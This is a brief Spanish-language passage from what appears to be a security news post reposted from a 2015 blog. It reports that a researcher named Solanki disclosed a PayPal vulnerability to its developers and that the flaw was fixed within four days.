Solanki informó de la vulnerabilidad al equipo de desarrolladores de Paypal, y luego de cuatro días, el equipo ya ha corregido el defecto

______________________
Tomado de: http://blog.segu-info.com.ar/2015/05/vulnerabilidad-critica-en-paypal.html#vulnerabilidad-critica-en-paypal
Se respetan Derechos de Autor.